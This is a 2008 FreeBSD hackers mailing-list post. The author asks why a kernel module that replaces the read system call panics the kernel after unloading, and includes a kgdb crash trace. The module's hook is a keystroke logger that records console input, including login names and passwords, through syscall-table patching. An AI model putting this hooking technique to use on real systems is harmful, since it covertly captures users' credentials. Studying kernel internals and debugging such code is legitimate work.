KLM - Fatal trap 12 on kldunload mod - sc replace

Lukasz Jaroszewski sigtrm at gmail.com
Mon Jun 16 12:43:44 UTC 2008 

Hi,
I am trying to master kernel, first thought was to do simple replace
of system call(read), tho i have some issues which I cant figure. My
read_hack is supposed to log keystrokes, and it does.. tho only login
and password typed from console but without 1st char(typed root
appears as oot.), next after kldunload and changing tty system does
``fatal trap''. Here is the code i use:
---------------------------cut--------------------------

read_hack(struct thread *td, void *syscall_args)
{
        struct read_args *uap;
        uap = (struct read_args *)syscall_args;

        int error;
        char buf[1];
        int done;

        error = read(td, syscall_args);

        if (error || (!uap->nbyte) || (uap->nbyte > 1) || (uap->fd !=
0))
                return(error);
        copyinstr(uap->buf, buf, 1, &done);
        log(LOG_INFO, "mex: %c\n", buf[0]);

        return(error);
}

---------------------------cut---------------------

And in load() i do:

---------------------------cut---------------------
load(struct module *module, int cmd, void *arg)
{
        int error = 0;

        switch (cmd) {
        case MOD_LOAD:
                oldsy = sysent[SYS_read].sy_call;
                sysent[SYS_read].sy_call = (sy_call_t *)read_hack;
                break;
        case MOD_UNLOAD:
                sysent[SYS_read].sy_call = (sy_call_t *)oldsy;
                break;
        default:
                error = EOPNOTSUPP;
                break;
        }
        return(error);
}

---------------------------cut-------------------

After changing to other tty i get:

--------------------------------------------------------------------
# kgdb kernel.debug /var/crash/vmcore.5
[GDB will not be able to debug user-mode threads: /usr/lib/
libthread_db.so: Undefined symbol "ps_pglobal_lookup"]
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and
you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details.
This GDB was configured as "i386-marcel-freebsd".

Unread portion of the kernel message buffer:

Fatal trap 12: page fault while in kernel mode
cpuid = 0; apic id = 00
fault virtual address   = 0xc23f656e
fault code              = supervisor read, page not present
instruction pointer     = 0x20:0xc23f656e
stack pointer           = 0x28:0xcd63bc60
frame pointer           = 0x28:0xcd63bc80
code segment            = base 0x0, limit 0xfffff, type 0x1b
                        = DPL 0, pres 1, def32 1, gran 1
processor eflags        = interrupt enabled, resume, IOPL = 0
current process         = 1139 (csh)
panic: from debugger
cpuid = 0
Uptime: 34m47s
Physical memory: 234 MB
Dumping 37 MB: 22 6

#0  doadump () at pcpu.h:195
195             __asm __volatile("movl %%fs:0,%0" : "=r" (td));
(kgdb) wh

;;------below reformatted text, tr'ed escape chars which made frame

around it-------
pcpu.h
177                         : "=m" (*(struct __s *)
(__pcpu_offset(name)))       \
178                         :
"r" (__s));                                       \
179             } else
{                                                        \
180                     *__PCPU_PTR(name) =
__val;                              \
181             }
\
182     }
183
184     #define PCPU_GET(member)        __PCPU_GET(pc_ ## member)
185     #define PCPU_ADD(member, val)   __PCPU_ADD(pc_ ## member, val)
186     #define PCPU_INC(member)        __PCPU_INC(pc_ ## member)
187     #define PCPU_PTR(member)        __PCPU_PTR(pc_ ## member)
188     #define PCPU_SET(member, val)   __PCPU_SET(pc_ ## member, val)
189
190     static __inline struct thread *
191     __curthread(void)
192     {
193             struct thread *td;
194
195             __asm __volatile("movl %%fs:0,%0" : "=r" (td));
196             return (td);
197     }
198     #define curthread               (__curthread())
199
200     #else /* !lint || defined(__GNUCLIKE_ASM) &&
defined(__GNUCLIKE___TYPEOF) */
201
202     #error "this file needs to be ported to your compiler"
203
204     #endif /* lint, etc. */
205
206     #endif /* _KERNEL */
207
208     #endif /* !_MACHINE_PCPU_H_ */
209
210
211
212
213
214
;;-----------------------------------end of tr'ed
frame---------------------------------
kernel Thread 100076 In: doadump   Line: 195  PC: 0xc074f42c
Segmentation fault (core dumped)
                                #
# uname -a
FreeBSD  7.0-BETA3 FreeBSD 7.0-BETA3 #1: Sat Nov 24 11:19:31 UTC
2007     root@:/usr/obj/usr/src/sys/BSDKITCHEN  i386

I know its BETA, but i don't think its an issue, i guess i am doing
something wrong. I would like to know as much as one can/have will/
time to explain me, where is layer 8 error. :)

Best regards
LVJ

More information about the freebsd-hackers mailing list